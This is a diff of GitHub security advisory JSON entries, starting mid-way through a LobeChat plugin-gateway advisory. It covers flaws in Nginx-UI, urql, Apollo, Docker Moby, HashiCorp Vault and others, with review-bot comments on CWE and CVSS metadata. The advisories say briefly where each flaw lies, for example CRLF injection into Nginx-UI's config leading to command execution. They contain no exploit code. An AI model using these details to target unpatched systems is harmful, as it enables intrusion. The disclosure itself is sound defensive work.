information\",\"name\":\"checkWeatherUsingGET\",\"parameters\":{\"properties\":{\"location\":{\"type\":\"string\"}},\"required\":[\"location\"],\"type\":\"object\"}}],\"homepage\":\"https://weathergpt.vercel.app/legal\",\"identifier\":\"WeatherGPT\",\"meta\":{\"avatar\":\"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/logo.webp\",\"description\":\"Get current weather information for a specific location.\",\"title\":\"WeatherGPT\"},\"openapi\":\"https://openai-collections.chat-plugin.lobehub.com/weather-gpt/openapi.json\",\"systemRole\":\"Use the WeatherGPT plugin to automatically fetch current weather information for a specific location when it's being generated by 
the ChatGPT assistant. The plugin will return weather data, including temperature, wind speed, humidity, and other relevant information, as well as a link to a page that has all the information. Links will always be returned and should be shown to the user. The weather data can be used to provide users with up-to-date and accurate weather information for their desired location.\",\"type\":\"default\",\"version\":\"1\",\"settings\":{\"properties\":{},\"type\":\"object\"}}}\n```\nHTTP response:\n```\nHTTP/1.1 200 OK\n[...]\n{\"location\":{\"name\":\"London\",\"region\":\"City of London, Greater London\",\"country\":\"United Kingdom\",\"lat\":51.52,\"lon\":-0.11,\"tz_id\":\"Europe/London\",\"localtime_epoch\":1706379026,\"localtime\":\"2024-01-27 18:10\"},\"current\":{\"last_updated_epoch\":1706378400,\"last_updated\":\"2024-01-27 18:00\",\"temp_c\":6,\"temp_f\":42.8,\"is_day\":0,\"condition\":{\"text\":\"Clear\",\"icon\":\"//cdn.weatherapi.com/weather/64x64/night/113.png\",\"code\":1000},\"wind_mph\":4.3,\"wind_kph\":6.8,\"wind_degree\":170,\"wind_dir\":\"S\",\"pressure_mb\":1031,\"pressure_in\":30.45,\"precip_mm\":0,\"precip_in\":0,\"humidity\":81,\"cloud\":0,\"feelslike_c\":3.8,\"feelslike_f\":38.9,\"vis_km\":10,\"vis_miles\":6,\"uv\":1,\"gust_mph\":9.5,\"gust_kph\":15.3},\"infoLink\":\"https://weathergpt.vercel.app/London\"}\n```\n###\tRemediation:\nVerify the `ACCESS_CODE` for HTTP requests to the `/api/plugin/:` route.\n\n###\tImpact:\nUnauthorized access to plugins.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "@lobehub/chat"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "0.122.4"
+ }
+ ]
+ }
+ ],
+ "database_specific": {
+ "last_known_affected_version_range": "<= 0.122.3"
+ }
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": 
"https://github.com/lobehub/lobe-chat/security/advisories/GHSA-pf55-fj96-xf37"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24566"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lobehub/lobe-chat/commit/2184167f09ab68e4efa051ee984ea0c4e7c48fbd"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/lobehub/lobe-chat"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-284"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-31T18:04:55Z",
+ "nvd_published_at": "2024-01-31T17:15:39Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-pgpj-v85q-h5fm/GHSA-pgpj-v85q-h5fm.json b/advisories/github-reviewed/2024/01/GHSA-pgpj-v85q-h5fm/GHSA-pgpj-v85q-h5fm.json
index 86250f0d94aa3..e992b2e1f7cf3 100644
--- a/advisories/github-reviewed/2024/01/GHSA-pgpj-v85q-h5fm/GHSA-pgpj-v85q-h5fm.json
+++ b/advisories/github-reviewed/2024/01/GHSA-pgpj-v85q-h5fm/GHSA-pgpj-v85q-h5fm.json
@@ -55,6 +55,10 @@
 {
 "type": "PACKAGE",
 "url": "https://github.com/pyload/pyload"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pyload-ng/PYSEC-2024-17.yaml"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2024/01/GHSA-qcjq-7f7v-pvc8/GHSA-qcjq-7f7v-pvc8.json b/advisories/github-reviewed/2024/01/GHSA-qcjq-7f7v-pvc8/GHSA-qcjq-7f7v-pvc8.json
new file mode 100644
index 0000000000000..5ce7efee9eef3
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-qcjq-7f7v-pvc8/GHSA-qcjq-7f7v-pvc8.json
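Review bot: `cwe_ids` carries the generic CWE-284 (Improper Access Control), but what `details` describes is a route (`/api/plugin/gateway`) that can be used with no `ACCESS_CODE` check at all, which is the more specific CWE-306 (Missing Authentication for Critical Function); recording it alongside or instead of CWE-284 would classify the issue more usefully. The vector's `C:N` matches the stated impact (`Unauthorized access to plugins`); if gateway calls are made with the operator's upstream plugin credentials a confidentiality component would apply, so that is worth confirming with the maintainers. The Remediation line in `details` writes the route pattern as `` `/api/plugin/:` ``, which looks like a truncated path parameter; the reporter presumably meant the whole `/api/plugin/` prefix.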
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qcjq-7f7v-pvc8",
+ "modified": "2024-01-29T22:30:24Z",
+ "published": "2024-01-29T22:30:24Z",
+ "aliases": [
+ "CVE-2024-23828"
+ ],
+ "summary": "Nginx-UI vulnerable to authenticated RCE through injecting into the application config via CRLF",
+ "details": "### Summary\n\nFix bypass to the following bugs\n\n- https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-pxmr-q2x3-9x9m\n- https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-8r25-68wm-jw35\n\nAllowing to inject directly in the `app.ini` via CRLF to change the value of `test_config_cmd` and `start_cmd` resulting in an Authenticated RCE\n\n### Impact\nAuthenticated Remote execution on the host",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/0xJacky/Nginx-UI"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.0.0-beta.12"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/0xJacky/nginx-ui/security/advisories/GHSA-qcjq-7f7v-pvc8"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23828"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/0xJacky/nginx-ui/commit/d70e37c8575e25b3da7203ff06da5e16c77a42d1"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/0xJacky/nginx-ui"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-74"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-29T22:30:24Z",
+ "nvd_published_at": "2024-01-29T17:15:10Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-qh2w-9m7w-hjg2/GHSA-qh2w-9m7w-hjg2.json b/advisories/github-reviewed/2024/01/GHSA-qh2w-9m7w-hjg2/GHSA-qh2w-9m7w-hjg2.json
index eb399e27f3ea7..5cc04c06a062d 100644
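Review bot: The `details` text opens with `Fix bypass to the following bugs`, which reads as a pull-request title rather than a description of the vulnerability; a first sentence restating what the last paragraph says — CRLF injection into `app.ini` lets an authenticated user change `test_config_cmd` and `start_cmd`, leading to command execution — would let `summary` and `details` stand on their own. `cwe_ids` uses the generic CWE-74; CWE-93 (Improper Neutralization of CRLF Sequences) for the injection path and CWE-78 (OS Command Injection) for its outcome describe the issue more precisely. The package name `github.com/0xJacky/Nginx-UI` differs in case from the repository URLs (`0xJacky/nginx-ui`); Go module paths are case-sensitive, so confirm which spelling the `go.mod` uses.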
--- a/advisories/github-reviewed/2024/01/GHSA-qh2w-9m7w-hjg2/GHSA-qh2w-9m7w-hjg2.json
+++ b/advisories/github-reviewed/2024/01/GHSA-qh2w-9m7w-hjg2/GHSA-qh2w-9m7w-hjg2.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qh2w-9m7w-hjg2",
- "modified": "2024-01-24T14:22:02Z",
+ "modified": "2024-01-29T19:12:47Z",
 "published": "2024-01-23T21:30:20Z",
 "aliases": [
 "CVE-2024-22497"
@@ -9,7 +9,10 @@
 "summary": "Cross-site Scripting in JFinal",
 "details": "Cross Site Scripting (XSS) vulnerability in /admin/login password parameter in JFinalcms 5.0.0 allows attackers to run arbitrary code via crafted URL.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
+ }
 ],
 "affected": [
 {
diff --git a/advisories/github-reviewed/2024/01/GHSA-qhjf-hm5j-335w/GHSA-qhjf-hm5j-335w.json b/advisories/github-reviewed/2024/01/GHSA-qhjf-hm5j-335w/GHSA-qhjf-hm5j-335w.json
new file mode 100644
index 0000000000000..7746ba728b323
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-qhjf-hm5j-335w/GHSA-qhjf-hm5j-335w.json
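Review bot: Nothing in this diff touches `database_specific.severity` for GHSA-qh2w-9m7w-hjg2 although the newly added vector (`AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`, base 6.1) implies MODERATE; in GHSA-mg2x-mggj-6955 the same kind of change bumped `severity` together with the vector, so confirm the stored value for this advisory already agrees — the field lies outside the hunk. The same check applies to GHSA-qjpf-2jhx-3758 below, whose added vector (`PR:N/C:H`, base 7.5) implies HIGH. In the context lines the `summary` says `JFinal` while `details` names `JFinalcms 5.0.0`; the product name should match.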
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qhjf-hm5j-335w",
+ "modified": "2024-01-30T20:57:28Z",
+ "published": "2024-01-30T20:57:28Z",
+ "aliases": [
+ "CVE-2024-24556"
+ ],
+ "summary": "@urql/next Cross-site Scripting vulnerability",
+ "details": "## impact\n\nThe `@urql/next` package is vulnerable to XSS. To exploit this an attacker would need to ensure that the response returns `html` tags and that the web-application is using streamed responses (non-RSC). This vulnerability is due to improper escaping of html-like characters in the response-stream.\n\nTo fix this vulnerability upgrade to version 1.1.1",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "npm",
+ "name": "@urql/next"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "1.1.1"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "WEB",
+ "url": "https://github.com/urql-graphql/urql/security/advisories/GHSA-qhjf-hm5j-335w"
+ },
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24556"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/urql-graphql/urql/commit/4b7011b70d5718728ff912d02a4dbdc7f703540d"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/urql-graphql/urql"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-30T20:57:28Z",
+ "nvd_published_at": "2024-01-30T18:15:48Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-qjpf-2jhx-3758/GHSA-qjpf-2jhx-3758.json b/advisories/github-reviewed/2024/01/GHSA-qjpf-2jhx-3758/GHSA-qjpf-2jhx-3758.json
index 3499af50be6d7..f3a63728f380e 100644
--- a/advisories/github-reviewed/2024/01/GHSA-qjpf-2jhx-3758/GHSA-qjpf-2jhx-3758.json
+++ b/advisories/github-reviewed/2024/01/GHSA-qjpf-2jhx-3758/GHSA-qjpf-2jhx-3758.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qjpf-2jhx-3758",
- "modified": "2024-01-24T21:51:30Z",
+ "modified": "2024-01-29T21:53:55Z",
 "published": "2024-01-24T18:31:02Z",
 "aliases": [
 "CVE-2024-23904"
@@ -9,7 +9,10 @@
 "summary": "Arbitrary file read vulnerability in Jenkins Log Command Plugin",
 "details": "Jenkins Log Command Plugin 1.0.2 and earlier does not disable a feature of its command parser that replaces an '@' character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read content from arbitrary files on the Jenkins controller file system.",
 "severity": [
-
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
 ],
 "affected": [
 {
diff --git a/advisories/github-reviewed/2024/01/GHSA-qm2j-qvq3-j29v/GHSA-qm2j-qvq3-j29v.json b/advisories/github-reviewed/2024/01/GHSA-qm2j-qvq3-j29v/GHSA-qm2j-qvq3-j29v.json
index 1146333d53075..e671985fd6532 100644
--- a/advisories/github-reviewed/2024/01/GHSA-qm2j-qvq3-j29v/GHSA-qm2j-qvq3-j29v.json
+++ b/advisories/github-reviewed/2024/01/GHSA-qm2j-qvq3-j29v/GHSA-qm2j-qvq3-j29v.json
@@ -1,13 +1,13 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qm2j-qvq3-j29v",
- "modified": "2024-01-23T19:00:41Z",
+ "modified": "2024-01-29T14:22:10Z",
 "published": "2024-01-23T12:49:27Z",
 "aliases": [
 "CVE-2023-48714"
 ],
 "summary": "Record titles for restricted records can be viewed if exposed by GridFieldAddExistingAutocompleter",
- "details": "### Impact\nIf a user should not be able to see a record, but that record can be added to a `GridField` using the `GridFieldAddExistingAutocompleter` component, the record's title can be accessed by that user.\n\n### References\n- https://www.silverstripe.org/download/security-releases/CVE-2023-48714\n",
+ "details": "### Impact\nIf a user should not be able to see a record, but that record can be added to a `GridField` using the `GridFieldAddExistingAutocompleter` component, the record's title can be accessed by that user.\n\n**Base CVSS:** [4.3](https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N/E:F/RL:O/RC:C&version=3.1)\n**Reported by:** Nick K - LittleMonkey, [littlemonkey.co.nz](http://littlemonkey.co.nz/)\n\n### References\n- https://www.silverstripe.org/download/security-releases/CVE-2023-48714\n",
 "severity": [
 {
 "type": "CVSS_V3",
@@ -78,7 +78,8 @@
 ],
 "database_specific": {
 "cwe_ids": [
- "CWE-200"
+ "CWE-200",
+ "CWE-732"
 ],
 "severity": "MODERATE",
 "github_reviewed": true,
diff --git a/advisories/github-reviewed/2024/01/GHSA-qrqr-3x5j-2xw9/GHSA-qrqr-3x5j-2xw9.json b/advisories/github-reviewed/2024/01/GHSA-qrqr-3x5j-2xw9/GHSA-qrqr-3x5j-2xw9.json
new file mode 100644
index 0000000000000..92d7bfbe8a4d8
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-qrqr-3x5j-2xw9/GHSA-qrqr-3x5j-2xw9.json
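Review bot: The rewritten `details` embeds a calculator link whose vector carries temporal metrics (`E:F/RL:O/RC:C`) next to a 4.3 figure labelled "Base CVSS", while the advisory's own `severity` entry — its `score` line is outside this hunk — is expected to hold the base vector only; confirm the structured field reads `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N` so the prose and the field do not drift apart. The reporter link is plain `http://littlemonkey.co.nz/`; an `https://` URL is preferable for a reference in a security advisory. Adding CWE-732 beside CWE-200 is a reasonable classification of the described access-control gap.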
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qrqr-3x5j-2xw9",
+ "modified": "2024-01-31T23:28:22Z",
+ "published": "2024-01-31T23:28:22Z",
+ "aliases": [
+ "CVE-2018-12608"
+ ],
+ "summary": "Docker Moby Authentication Bypass",
+ "details": "An issue was discovered in Docker Moby before 17.06.0. The Docker engine validated a client TLS certificate using both the configured client CA root certificate and all system roots on non-Windows systems. This allowed a client with any domain validated certificate signed by a system-trusted root CA (as opposed to one signed by the configured CA root certificate) to authenticate.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/moby/moby"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "17.06.0-ce"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12608"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/moby/moby/issues/33173"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/moby/moby/pull/33182"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/moby/moby/commit/190c6e8cf8b893874a33d83f78307f1bed0bfbcd"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-288"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-31T23:28:22Z",
+ "nvd_published_at": null
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-r8xp-52mq-rmm8/GHSA-r8xp-52mq-rmm8.json b/advisories/github-reviewed/2024/01/GHSA-r8xp-52mq-rmm8/GHSA-r8xp-52mq-rmm8.json
new file mode 100644
index 0000000000000..eb444aae6feff
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-r8xp-52mq-rmm8/GHSA-r8xp-52mq-rmm8.json
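Review bot: `cwe_ids` gives CWE-288 (Authentication Bypass Using an Alternate Path or Channel), but the defect `details` describes is the daemon trusting the system root store in addition to the configured client CA when validating client certificates, which is CWE-295 (Improper Certificate Validation); that classification matches the text better. The `fixed` event `17.06.0-ce` is a Docker release tag rather than a semver string, and with `type: ECOSYSTEM` on a Go module it is unclear how the matcher orders it against `github.com/moby/moby` versions — worth confirming, or pairing it with a `last_known_affected_version_range` as the npm and Go entries elsewhere in this change do. `nvd_published_at` is `null` for a 2018 CVE that NVD lists (the first reference), presumably left unset by the import.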
@@ -0,0 +1,65 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-r8xp-52mq-rmm8",
+ "modified": "2024-01-31T22:43:05Z",
+ "published": "2024-01-31T09:30:18Z",
+ "aliases": [
+ "CVE-2023-44312"
+ ],
+ "summary": "Apache ServiceComb Service-Center Exposure of Sensitive Information to an Unauthorized Actor vulnerability",
+ "details": "Exposure of Sensitive Information to an Unauthorized Actor in Apache ServiceComb Service-Center. This issue affects Apache ServiceComb Service-Center before 2.1.0 (included). Users are recommended to upgrade to version 2.2.0, which fixes the issue.\n\n",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"
+ }
+ ],
+ "affected": [
+ {
+ "package": {
+ "ecosystem": "Go",
+ "name": "github.com/apache/servicecomb-service-center"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "0"
+ },
+ {
+ "fixed": "2.2.0"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44312"
+ },
+ {
+ "type": "PACKAGE",
+ "url": "https://github.com/apache/servicecomb-service-center"
+ },
+ {
+ "type": "WEB",
+ "url": "https://lists.apache.org/thread/dkvlgnrmc17qzjdy9k0cr60wpzcssk1s"
+ },
+ {
+ "type": "WEB",
+ "url": "http://www.openwall.com/lists/oss-security/2024/01/31/5"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": true,
+ "github_reviewed_at": "2024-01-31T22:43:05Z",
+ "nvd_published_at": "2024-01-31T09:15:43Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/github-reviewed/2024/01/GHSA-rjmv-52mp-gjrr/GHSA-rjmv-52mp-gjrr.json b/advisories/github-reviewed/2024/01/GHSA-rjmv-52mp-gjrr/GHSA-rjmv-52mp-gjrr.json
new file mode 100644
index 0000000000000..2720d70c87105
--- /dev/null
+++ b/advisories/github-reviewed/2024/01/GHSA-rjmv-52mp-gjrr/GHSA-rjmv-52mp-gjrr.json
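Review bot: `details` says the issue affects Service-Center `before 2.1.0 (included)` while the range marks everything below `2.2.0` as affected; if any 2.1.x patch release exists between the two it is covered by the range but contradicted by the text, so one of them should be aligned (the vendor list thread in the references should settle it). The `details` string also ends with a stray `\n\n`, and the oss-security reference is written as plain `http://www.openwall.com/...` although the archive is served over HTTPS. The summary restates the CWE-200 title verbatim without naming what information is exposed; a short phrase from the vendor announcement would make the entry more useful to readers scanning the database.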
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rjmv-52mp-gjrr", + "modified": "2024-01-30T20:56:50Z", + "published": "2024-01-30T20:56:50Z", + "aliases": [ + "CVE-2024-22193" + ], + "summary": "vantage6 may create unencrypted tasks in encrypted collaboration", + "details": "### Impact\nThere are no checks on whether the input is encrypted if a task is created in an encrypted collaboration. Therefore, a user may accidentally create a task with sensitive input data that will then be stored unencrypted in a database.\n\n### Workarounds\nThis is not an issue with the normal workflow, only if e.g. a user with the python client sets encryption to the wrong value.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "vantage6" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/security/advisories/GHSA-rjmv-52mp-gjrr" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-22193" + }, + { + "type": "WEB", + "url": "https://github.com/vantage6/vantage6/commit/6383283733b81abfcacfec7538dc4dc882e98074" + }, + { + "type": "PACKAGE", + "url": "https://github.com/vantage6/vantage6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-922" + ], + "severity": "LOW", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:56:50Z", + "nvd_published_at": "2024-01-30T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-rpgp-9hmg-j25x/GHSA-rpgp-9hmg-j25x.json b/advisories/github-reviewed/2024/01/GHSA-rpgp-9hmg-j25x/GHSA-rpgp-9hmg-j25x.json new file mode 100644 index 0000000000000..bb28b862a4cc1 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-rpgp-9hmg-j25x/GHSA-rpgp-9hmg-j25x.json 
@@ -0,0 +1,84 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rpgp-9hmg-j25x", + "modified": "2024-01-31T23:11:40Z", + "published": "2024-01-31T23:11:40Z", + "aliases": [ + "CVE-2020-35177" + ], + "summary": "Enumeration of users in HashiCorp Vault", + "details": "HashiCorp Vault and Vault Enterprise allowed the enumeration of users via the LDAP auth method. Fixed in 1.5.6 and 1.6.1.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N/E:U/RL:O/RC:R" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.5.0" + }, + { + "fixed": "1.5.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.6.0" + }, + { + "fixed": "1.6.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35177" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/pull/10537" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2020-25-vault-s-ldap-auth-method-allows-user-enumeration/18984" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/blob/master/CHANGELOG.md#161" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:11:40Z", + "nvd_published_at": "2020-12-17T05:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-rq95-xf66-j689/GHSA-rq95-xf66-j689.json b/advisories/github-reviewed/2024/01/GHSA-rq95-xf66-j689/GHSA-rq95-xf66-j689.json new file mode 100644 index 0000000000000..ce36a1891c86c --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-rq95-xf66-j689/GHSA-rq95-xf66-j689.json 
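Review bot: The `score` string carries temporal metrics (`/E:U/RL:O/RC:R`) after the base vector, unlike every other `CVSS_V3` entry in this change, which stores the base vector only; a temporal-aware calculator produces a lower number than the base score that the `severity` field presumably reflects. Consider trimming it to `"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"` so consumers compare like with like. The affected ranges start at `1.5.0` and `1.6.0`, while `details` only states the fix versions 1.5.6 and 1.6.1; whether releases before 1.5.0 are also affected is not stated and should be confirmed against the HCSEC-2020-25 reference. The CHANGELOG reference points at `master`, whose `#161` anchor can drift; a tag-pinned URL is more durable.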
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rq95-xf66-j689", + "modified": "2024-01-31T23:22:08Z", + "published": "2024-01-31T23:22:08Z", + "aliases": [ + "CVE-2021-3282" + ], + "summary": "Improper Authentication in HashiCorp Vault", + "details": "HashiCorp Vault Enterprise 1.6.0 & 1.6.1 allowed the `remove-peer` raft operator command to be executed against DR secondaries without authentication. Fixed in 1.6.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/vault" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.6.0" + }, + { + "fixed": "1.6.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-3282" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/vault/commit/09f9068e22f762da123160233518b440e00bdb3b" + }, + { + "type": "WEB", + "url": "https://discuss.hashicorp.com/t/hcsec-2021-04-vault-enterprise-s-dr-secondaries-allowed-raft-peer-removal-without-authentication/20337" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202207-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:22:08Z", + "nvd_published_at": "2021-02-01T16:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-rv8p-rr2h-fgpg/GHSA-rv8p-rr2h-fgpg.json b/advisories/github-reviewed/2024/01/GHSA-rv8p-rr2h-fgpg/GHSA-rv8p-rr2h-fgpg.json new file mode 100644 index 0000000000000..83f23c9b807d5 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-rv8p-rr2h-fgpg/GHSA-rv8p-rr2h-fgpg.json 
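Review bot: The `details` scope the issue to Vault Enterprise (`remove-peer` against DR secondaries), but the only affected package is the open-source Go module `github.com/hashicorp/vault`, so module-based scanners will flag OSS 1.6.0 and 1.6.1 builds whose exposure the text does not establish. If the database has no separate identifier for the Enterprise distribution, make the scope visible to consumers, e.g. `"summary": "Improper Authentication in HashiCorp Vault Enterprise"` or a `database_specific` note stating that the OSS module is listed as the nearest available identifier.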
@@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rv8p-rr2h-fgpg", + "modified": "2024-01-30T20:57:45Z", + "published": "2024-01-30T20:57:45Z", + "aliases": [ + "CVE-2024-23841" + ], + "summary": "@apollo/experimental-nextjs-app-support Cross-site Scripting vulnerability", + "details": "### Impact\n\nThe @apollo/experimental-apollo-client-nextjs NPM package is vulnerable to a cross-site scripting vulnerability. This vulnerability arises from improper handling of untrusted input when @apollo/experimental-apollo-client-nextjs performs server-side rendering of HTML pages. To fix this vulnerability, we implemented appropriate escaping to prevent javascript injection into rendered pages.\n\n### Patches\n\nTo fix this issue, please update to version 0.7.0 or later.\n\n### Workarounds\n\nThere are no known workarounds for this issue. Please update to version 0.7.0\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@apollo/experimental-nextjs-app-support" + }, + "ranges": 